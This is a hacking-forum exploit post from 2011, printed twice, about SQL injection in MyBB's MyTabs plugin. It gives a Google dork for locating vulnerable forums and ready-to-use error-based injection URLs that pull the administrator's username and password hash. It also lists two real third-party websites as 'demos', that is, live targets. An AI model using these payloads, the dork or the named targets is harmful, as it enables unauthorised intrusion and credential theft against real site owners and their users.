=====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================
# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Share : Bekasi0d0nk (Admin MAHO) & Andrian21 (Orang Ganteng)
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , Childzcyber.web.id
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://adf.ly/2GtLF
# Google dork : inurl:/forum/index.php?tab= "Powered By MyBB"
Vulnerability :
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
---------------------------------------
# ~ Demos ~ #
---------------------------------------
http://www.malluvdo.net/forum/index.php?tab=4' (secworm - Ethical Hacking & IT security forum - ROFL !)
http://www.network-unlimited.com/forum/index.php?tab=2'
_ _ ____ _ _ _ _ _ _ ____ _
/ \ _ _| |_ ___ | _ \| | | | \ | | __ _ _ __ __| | __| | _ \ ___ __ _| |
/ _ \| | | | __/ _ \| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | |
/ ___ \ |_| | |_ (_) | _ <| |_| | |\ | | (_| | | | | (_| | | (_| | _ < _\__ \ (_| | |___
/_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \__,_|_| |_|\__,_| \__,_|_| \_(_)___/\__, |_____|
|_|
# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.
____ _ ____ ____ _ _ _ _ _
| _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | |
| |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | |
| __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
|_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
# 2011 ChildzCyber.Web.Id
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================
# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Share : Bekasi0d0nk (Admin MAHO) & Andrian21 (Orang Ganteng)
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , Childzcyber.web.id
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://adf.ly/2GtLF
# Google dork : inurl:/forum/index.php?tab= "Powered By MyBB"
Vulnerability :
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
---------------------------------------
# ~ Demos ~ #
---------------------------------------
http://www.malluvdo.net/forum/index.php?tab=4' (secworm - Ethical Hacking & IT security forum - ROFL !)
http://www.network-unlimited.com/forum/index.php?tab=2'
_ _ ____ _ _ _ _ _ _ ____ _
/ \ _ _| |_ ___ | _ \| | | | \ | | __ _ _ __ __| | __| | _ \ ___ __ _| |
/ _ \| | | | __/ _ \| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | |
/ ___ \ |_| | |_ (_) | _ <| |_| | |\ | | (_| | | | | (_| | | (_| | _ < _\__ \ (_| | |___
/_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \__,_|_| |_|\__,_| \__,_|_| \_(_)___/\__, |_____|
|_|
# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.
____ _ ____ ____ _ _ _ _ _
| _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | |
| |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | |
| __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
|_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
# 2011 ChildzCyber.Web.Id
